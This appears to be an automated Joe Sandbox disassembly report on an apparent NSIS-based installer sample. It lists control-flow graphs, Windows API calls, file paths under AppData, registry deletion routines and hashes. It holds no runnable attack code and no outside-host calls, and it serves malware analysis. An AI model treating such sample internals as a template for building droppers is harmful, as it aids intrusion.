                                                  • Instruction ID: 615a13079a357bc63dc92eaebf5b97e46402dd0953b19927b77141fc7a078d9b
                                                  • Opcode Fuzzy Hash: df49f6763b05bfa84c1d779e4394ea7a5d72abe941678efbb561a9aecc95dd19
                                                  • Instruction Fuzzy Hash: B6C1A371A04201BBDB216F61ED49E2B3AA8FB95705F40093EF601B51F1C7799892DB2E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 277 40391f-403937 call 4062b2 280 403939-403949 call 405e8f 277->280 281 40394b-403982 call 405e15 277->281 290 4039a5-4039ce call 403bf5 call 405a9b 280->290 286 403984-403995 call 405e15 281->286 287 40399a-4039a0 lstrcatW 281->287 286->287 287->290 295 403a60-403a68 call 405a9b 290->295 296 4039d4-4039d9 290->296 302 403a76-403a9b LoadImageW 295->302 303 403a6a-403a71 call 405f6a 295->303 296->295 298 4039df-403a07 call 405e15 296->298 298->295 304 403a09-403a0d 298->304 306 403b1c-403b24 call 40140b 302->306 307 403a9d-403acd RegisterClassW 302->307 303->302 308 403a1f-403a2b lstrlenW 304->308 309 403a0f-403a1c call 4059c0 304->309 320 403b26-403b29 306->320 321 403b2e-403b39 call 403bf5 306->321 310 403ad3-403b17 SystemParametersInfoW CreateWindowExW 307->310 311 403beb 307->311 315 403a53-403a5b call 405993 call 405f48 308->315 316 403a2d-403a3b lstrcmpiW 308->316 309->308 310->306 313 403bed-403bf4 311->313 315->295 316->315 319 403a3d-403a47 GetFileAttributesW 316->319 323 403a49-403a4b 319->323 324 403a4d-403a4e call 4059df 319->324 320->313 330 403bc2-403bc3 call 4052c5 321->330 331 403b3f-403b5c ShowWindow LoadLibraryW 321->331 323->315 323->324 324->315 337 403bc8-403bca 330->337 332 403b65-403b77 GetClassInfoW 331->332 333 403b5e-403b63 LoadLibraryW 331->333 335 403b79-403b89 GetClassInfoW RegisterClassW 332->335 336 403b8f-403bb2 DialogBoxParamW call 40140b 332->336 333->332 335->336 342 403bb7-403bc0 call 40386f 336->342 339 403be4-403be6 call 40140b 337->339 340 403bcc-403bd2 337->340 339->311 340->320 343 403bd8-403bdf call 40140b 340->343 342->313 343->320
                                                  APIs
                                                    • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                    • Part of subcall function 004062B2: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                    • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                  • lstrcatW.KERNEL32(1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000,"C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe"), ref: 004039A0
                                                  • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,C:\Users\user~1\AppData\Local\Temp\), ref: 00403A20
                                                  • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403A33
                                                  • GetFileAttributesW.KERNEL32(Call), ref: 00403A3E
                                                  • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy), ref: 00403A87
                                                    • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                  • RegisterClassW.USER32(004281A0), ref: 00403AC4
                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ADC
                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B11
                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403B47
                                                  • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403B58
                                                  • LoadLibraryW.KERNEL32(RichEd32), ref: 00403B63
                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403B73
                                                  • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403B80
                                                  • RegisterClassW.USER32(004281A0), ref: 00403B89
                                                  • DialogBoxParamW.USER32(?,00000000,00403CC2,00000000), ref: 00403BA8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: "C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                                  • API String ID: 914957316-433754792
                                                  • Opcode ID: 9ff61719f6c30c529665ce4dbc08b581b5599c43b58c29c5b92350d035ae6190
                                                  • Instruction ID: 309fb0296e4a6d1bba18aa3b2e86eaa258190dfd088e540a173f113b23667d40
                                                  • Opcode Fuzzy Hash: 9ff61719f6c30c529665ce4dbc08b581b5599c43b58c29c5b92350d035ae6190
                                                  • Instruction Fuzzy Hash: BE61B570644200BED720AF669C46F2B3A7CEB84749F40457FF945B62E2DB796902CA3D

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 348 402dbc-402e0a GetTickCount GetModuleFileNameW call 405bb4 351 402e16-402e44 call 405f48 call 4059df call 405f48 GetFileSize 348->351 352 402e0c-402e11 348->352 360 402f34-402f42 call 402d1a 351->360 361 402e4a-402e61 351->361 353 40305b-40305f 352->353 367 403013-403018 360->367 368 402f48-402f4b 360->368 363 402e63 361->363 364 402e65-402e72 call 4032f9 361->364 363->364 372 402e78-402e7e 364->372 373 402fcf-402fd7 call 402d1a 364->373 367->353 370 402f77-402fc3 GlobalAlloc call 4063ce call 405be3 CreateFileW 368->370 371 402f4d-402f65 call 40330f call 4032f9 368->371 397 402fc5-402fca 370->397 398 402fd9-403009 call 40330f call 403062 370->398 371->367 400 402f6b-402f71 371->400 375 402e80-402e98 call 405b6f 372->375 376 402efe-402f02 372->376 373->367 384 402f0b-402f11 375->384 393 402e9a-402ea1 375->393 383 402f04-402f0a call 402d1a 376->383 376->384 383->384 385 402f13-402f21 call 406360 384->385 386 402f24-402f2e 384->386 385->386 386->360 386->361 393->384 399 402ea3-402eaa 393->399 397->353 408 40300e-403011 398->408 399->384 401 402eac-402eb3 399->401 400->367 400->370 401->384 403 402eb5-402ebc 401->403 403->384 405 402ebe-402ede 403->405 405->367 407 402ee4-402ee8 405->407 409 402ef0-402ef8 407->409 410 402eea-402eee 407->410 408->367 411 40301a-40302b 408->411 409->384 412 402efa-402efc 409->412 410->360 410->409 413 403033-403038 411->413 414 40302d 411->414 412->384 415 403039-40303f 413->415 414->413 415->415 416 403041-403059 call 405b6f 415->416 416->353
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00402DD0
                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe,00000400), ref: 00402DEC
                                                    • Part of subcall function 00405BB4: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe,80000000,00000003), ref: 00405BB8
                                                    • Part of subcall function 00405BB4: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405BDA
                                                  • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe,C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe,80000000,00000003), ref: 00402E35
                                                  • GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                  • String ID: "C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                  • API String ID: 2803837635-909786098
                                                  • Opcode ID: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                                  • Instruction ID: b2cc58b1aa553f56ba66d3b0850f03698e33e3340d89f7fe3e9d1fe3a0eb5287
                                                  • Opcode Fuzzy Hash: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                                  • Instruction Fuzzy Hash: 43610371941205ABDB209FA4DD85B9E3BB8EB04354F20447BF605B72D2C7BC9E418BAD

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 611 4051f2-405207 612 40520d-40521e 611->612 613 4052be-4052c2 611->613 614 405220-405224 call 405f6a 612->614 615 405229-405235 lstrlenW 612->615 614->615 617 405252-405256 615->617 618 405237-405247 lstrlenW 615->618 619 405265-405269 617->619 620 405258-40525f SetWindowTextW 617->620 618->613 621 405249-40524d lstrcatW 618->621 622 40526b-4052ad SendMessageW * 3 619->622 623 4052af-4052b1 619->623 620->619 621->617 622->623 623->613 624 4052b3-4052b6 623->624 624->613
                                                  APIs
                                                  • lstrlenW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                  • lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                  • lstrcatW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                  • SetWindowTextW.USER32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll), ref: 0040525F
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                  • String ID: Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll
                                                  • API String ID: 2531174081-2416552334
                                                  • Opcode ID: 241caa620ce1fcc58b3a3595d79cd8debb0f013b3e7c164dabd01d0a25878295
                                                  • Instruction ID: 09d17c59ce7287a2cbf3dc662f19c44123261f726eb293d34c68041fb2ac0666
                                                  • Opcode Fuzzy Hash: 241caa620ce1fcc58b3a3595d79cd8debb0f013b3e7c164dabd01d0a25878295
                                                  • Instruction Fuzzy Hash: CA21A131900558BBCB219FA5DD849DFBFB8EF54310F14807AF904B62A0C3798A81CFA8

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 625 402573-402588 call 402b1d 628 4029c7-4029ca 625->628 629 40258e-402595 625->629 630 4029d0-4029d6 628->630 631 402597 629->631 632 40259a-40259d 629->632 631->632 634 4025a3-4025b2 call 405ea8 632->634 635 4026e6-4026ee 632->635 634->635 638 4025b8 634->638 635->628 639 4025be-4025c2 638->639 640 402657-402667 call 405c37 639->640 641 4025c8-4025e3 ReadFile 639->641 640->635 648 402669 640->648 641->635 642 4025e9-4025ee 641->642 642->635 644 4025f4-402602 642->644 646 4026a2-4026ae call 405e8f 644->646 647 402608-40261a MultiByteToWideChar 644->647 646->630 647->648 650 40261c-40261f 647->650 651 40266c-40266f 648->651 653 402621-40262c 650->653 651->646 654 402671-402676 651->654 653->651 657 40262e-402653 SetFilePointer MultiByteToWideChar 653->657 655 4026b3-4026b7 654->655 656 402678-40267d 654->656 659 4026d4-4026e0 SetFilePointer 655->659 660 4026b9-4026bd 655->660 656->655 658 40267f-402692 656->658 657->653 661 402655 657->661 658->635 662 402694-40269a 658->662 659->635 663 4026c5-4026d2 660->663 664 4026bf-4026c3 660->664 661->648 662->639 665 4026a0 662->665 663->635 664->659 664->663 665->635
                                                  APIs
                                                  • ReadFile.KERNELBASE(?,?,?,?), ref: 004025DB
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402616
                                                  • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 00402639
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040264F
                                                    • Part of subcall function 00405C37: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B
                                                    • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                  • String ID: 9
                                                  • API String ID: 1149667376-2366072709
                                                  • Opcode ID: 14d7a1a443259207830479a75009ee39c6dacd7ae2e8022bb32dc9fb2f0741b6
                                                  • Instruction ID: 34008a6f5bb5370994306dbe4266d00811a1d2e87b5126a94146f67fdcf6739f
                                                  • Opcode Fuzzy Hash: 14d7a1a443259207830479a75009ee39c6dacd7ae2e8022bb32dc9fb2f0741b6
                                                  • Instruction Fuzzy Hash: 0E51E771E04209ABDF24DF94DE88AAEB779FF04304F50443BE511B62D0D7B99A42CB69

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 666 40317d-4031a6 GetTickCount 667 4032e7-4032ef call 402d1a 666->667 668 4031ac-4031d7 call 40330f SetFilePointer 666->668 673 4032f1-4032f6 667->673 674 4031dc-4031ee 668->674 675 4031f0 674->675 676 4031f2-403200 call 4032f9 674->676 675->676 679 403206-403212 676->679 680 4032d9-4032dc 676->680 681 403218-40321e 679->681 680->673 682 403220-403226 681->682 683 403249-403265 call 4063ee 681->683 682->683 684 403228-403248 call 402d1a 682->684 689 4032e2 683->689 690 403267-40326f 683->690 684->683 691 4032e4-4032e5 689->691 692 403271-403287 WriteFile 690->692 693 4032a3-4032a9 690->693 691->673 694 403289-40328d 692->694 695 4032de-4032e0 692->695 693->689 696 4032ab-4032ad 693->696 694->695 697 40328f-40329b 694->697 695->691 696->689 698 4032af-4032c2 696->698 697->681 699 4032a1 697->699 698->674 700 4032c8-4032d7 SetFilePointer 698->700 699->698 700->667
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00403192
                                                    • Part of subcall function 0040330F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                  • WriteFile.KERNELBASE(0040BE90,0040E236,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                  • SetFilePointer.KERNELBASE(00004E18,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: File$Pointer$CountTickWrite
                                                  • String ID: 6@
                                                  • API String ID: 2146148272-2414527261
                                                  • Opcode ID: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                  • Instruction ID: 34320a24581f7621071559271f75aff2a33e70c32c739a51ea230fcf3b1a2f41
                                                  • Opcode Fuzzy Hash: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                  • Instruction Fuzzy Hash: CB418B72504205DFDB109F29EE84AA63BADF74431671441BFE604B22E1C7B96D418BEC

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 701 4015b9-4015cd call 402b3a call 405a3e 706 401614-401617 701->706 707 4015cf-4015eb call 4059c0 CreateDirectoryW 701->707 709 401646-402197 call 401423 706->709 710 401619-401638 call 401423 call 405f48 SetCurrentDirectoryW 706->710 715 40160a-401612 707->715 716 4015ed-4015f8 GetLastError 707->716 723 402793-40279a 709->723 724 4029c7-4029d6 709->724 710->724 725 40163e-401641 710->725 715->706 715->707 719 401607 716->719 720 4015fa-401605 GetFileAttributesW 716->720 719->715 720->715 720->719 723->724 725->724
                                                  APIs
                                                    • Part of subcall function 00405A3E: CharNextW.USER32(?,?,00424EF0,?,00405AB2,00424EF0,00424EF0,?,?,771B2EE0,004057F0,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe"), ref: 00405A4C
                                                    • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A51
                                                    • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A69
                                                  • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                  • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Eneforhandler231,?,00000000,000000F0), ref: 00401630
                                                  Strings
                                                  • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Eneforhandler231, xrefs: 00401623
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                  • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Eneforhandler231
                                                  • API String ID: 3751793516-1862805445
                                                  • Opcode ID: 9b673ddbf1d69572a6be76a75328456f52fe096521e7ed3c2b5c74dd951979b8
                                                  • Instruction ID: 602e027c19ef8137931421d3e2870900c2c1aa36f58208ee64056e3add0ea48c
                                                  • Opcode Fuzzy Hash: 9b673ddbf1d69572a6be76a75328456f52fe096521e7ed3c2b5c74dd951979b8
                                                  • Instruction Fuzzy Hash: 4F11C271904200EBCF206FA0CD449AE7AB4FF14369B34463BF881B62E1D23D49419A6E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 728 402b7a-402ba3 RegOpenKeyExW 729 402ba5-402bb0 728->729 730 402c0e-402c12 728->730 731 402bcb-402bdb RegEnumKeyW 729->731 732 402bb2-402bb5 731->732 733 402bdd-402bef RegCloseKey call 4062b2 731->733 734 402c02-402c05 RegCloseKey 732->734 735 402bb7-402bc9 call 402b7a 732->735 741 402bf1-402c00 733->741 742 402c15-402c1b 733->742 739 402c0b-402c0d 734->739 735->731 735->733 739->730 741->730 742->739 743 402c1d-402c2b RegDeleteKeyW 742->743 743->739 744 402c2d 743->744 744->730
                                                  APIs
                                                  • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402B9B
                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Close$DeleteEnumOpen
                                                  • String ID:
                                                  • API String ID: 1912718029-0
                                                  • Opcode ID: b547f4a97addcc1e8c82d95905b84b8973278d2723117ef79469a300e8f1f4e9
                                                  • Instruction ID: 39c85bfe7ca74ada2351cc0a51ccebcd1f3e21716521df4e7e96f28c7df0de5f
                                                  • Opcode Fuzzy Hash: b547f4a97addcc1e8c82d95905b84b8973278d2723117ef79469a300e8f1f4e9
                                                  • Instruction Fuzzy Hash: 5B116A31904008FEEF229F90DE89EAE3B7DFB14348F100476FA01B00A0D3B59E51EA69

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
